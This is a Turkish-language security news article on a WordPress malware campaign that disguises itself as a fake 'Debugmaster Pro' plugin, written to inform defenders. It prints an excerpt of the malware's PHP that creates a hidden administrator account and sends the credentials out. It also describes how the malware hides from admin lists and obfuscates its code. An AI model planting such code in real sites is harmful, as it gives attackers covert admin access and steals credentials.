WordPress web sitelerini hedefleyen gelişmiş steganografik teknikler ve yetkisiz yönetici erişimini sürdürmek için kalıcı arka kapı mekanizmaları kullanan gelişmiş bir kötü amaçlı yazılım kampanyası keşfedildi.
Kötü amaçlı yazılım, esnek bir saldırı altyapısı oluşturmak için birlikte çalışan iki temel bileşen aracılığıyla çalışır ve siber suçluların geleneksel güvenlik önlemleri ile tespit edilmemiş kalırken, tehlikeye atılmış web sitelerinde kalıcı dayanaklar oluşturmasını sağlar.
Saldırı, meşru WordPress bileşenleri olarak maskelenmek için tasarlanmış kötü amaçlı dosyaların dağıtılmasıyla başlar.
Bu dosyalar, algılamayı önlemek için birden fazla gizleme ve kodlama katmanı kullanır ve saldırganların ilk güvenlik ihlalleri keşfedildikten sonra bile erişimi korumak için kullanabileceği sert kodlanmış kimlik bilgilerine sahip yönetici hesapları oluşturur.
Kötü amaçlı yazılım mimarisi, WordPress’in dahili mekanizmalarının sofistike bir anlayışını gösterir ve kalıcı erişim noktaları oluşturmak için hem eklenti altyapısı hem de temel kullanıcı yönetimi işlevlerinden yararlanır.
Basit hesap oluşturmanın ötesinde, kötü amaçlı yazılım, komut ve kontrol sunucuları ile gelişmiş iletişim protokollerini uygular ve saldırgan kontrollü uç noktalara otomatik olarak uzlaşmış kimlik bilgilerini ve sistem bilgilerini aktarır.
Bu, tehdit aktörlerinin birden fazla tehlikeye atılan sitede aynı anda idari erişim kimlik bilgilerini hasat etmelerini sağlar ve kapsamlı tehlike altına alınmış WordPress kurulumları ağları oluşturur.
Sucuri analistleri, rutin güvenlik temizliği sırasında kötü amaçlı yazılımları belirledi ve kaldırma girişimlerine aktif olarak direnen sofistike kalıcılık mekanizmalarını gözlemledi.
Kötü amaçlı yazılımın etkisi, basit yetkisiz erişimin ötesine uzanır, potansiyel olarak saldırganların kötü niyetli içerik enjekte etmesini, ziyaretçileri hileli web sitelerine yönlendirmesini, hassas bilgileri hasat etmesini veya ek kötü amaçlı yükler dağıtmasını sağlar.
Gizli taktiklerin ve kalıcı mekanizmaların birleşimi, bu kampanyayı özellikle uzun süreler boyunca uzlaşmadan habersiz kalabilecek web sitesi sahipleri için özellikle tehlikeli hale getirirken, saldırganlar sistemlerine sessiz erişimi sürdürüyor.
Gelişmiş kalıcılık ve gizli mekanizmalar
Kötü amaçlı yazılım, kalıcılık taktiklerinde olağanüstü bir karmaşıklık gösterir ve gereksiz erişim yolları sağlayan çift dosya yaklaşımı kullanır.
.webp)
Birincil bileşen, sürüm numaraları, GitHub depoları ve profesyonel açıklamalar dahil ikna edici meta verilerle tamamlanan “Debugmaster Pro” eklentisi olarak gizlenir.
Bununla birlikte, bu cephenin altında, yönetici hesapları oluşturmak ve harici sunucularla iletişim kanalları oluşturmak için tasarlanmış yoğun bir şekilde gizlenmiş kod bulunmaktadır.
public function create_admin_user() {
if (get_option($this->init_flag, false)) return;
$creds = $this->generate_credentials();
if (!username_exists($creds["user"])) {
$user_id = wp_create_user($creds["user"], $creds["pass"], $creds["email"]);
if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role("administrator");
}
}
$this->send_credentials($creds);
update_option($this->init_flag, time() + 86400 * 30);
}Kötü amaçlı yazılım, hem otomatik güvenlik araçları hem de manuel inceleme tarafından algılanmayı önlemek için birden fazla kaçırma tekniği uygular.
Filtrelenmiş sorguları kullanarak kendisini WordPress eklenti listelerinden aktif olarak kaldırır ve standart kullanıcı yönetimi arayüzlerinden yönetici kullanıcı hesaplarını gizler.
.webp)
Kod, gerçek işlevselliğini gizlemek için kapsamlı onaltılık kodlama ve GOTO ifadeleri kullanıyor ve statik analizi güvenlik araştırmacıları için önemli ölçüde daha zor hale getiriyor.
Ayrıca, kötü amaçlı yazılım, yönetici erişim modellerini tanımlamak için IP izleme mekanizmalarını içerirken, meşru kullanıcılara kötü niyetli işlevselliği ortaya çıkarmamak için bilinen yönetimsel IP adreslerini aynı anda beyaz listeye koyar.
Bu seçici görünürlük, kötü amaçlı yazılımların web sitesi sahiplerinden gizli kalmasını sağlarken düzenli ziyaretçilere karşı çalışmaya devam ederek, tipik olarak ileri kalıcı tehdit gruplarıyla ilişkili operasyonel güvenlik ilkeleri hakkında sofistike bir anlayış gösterir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
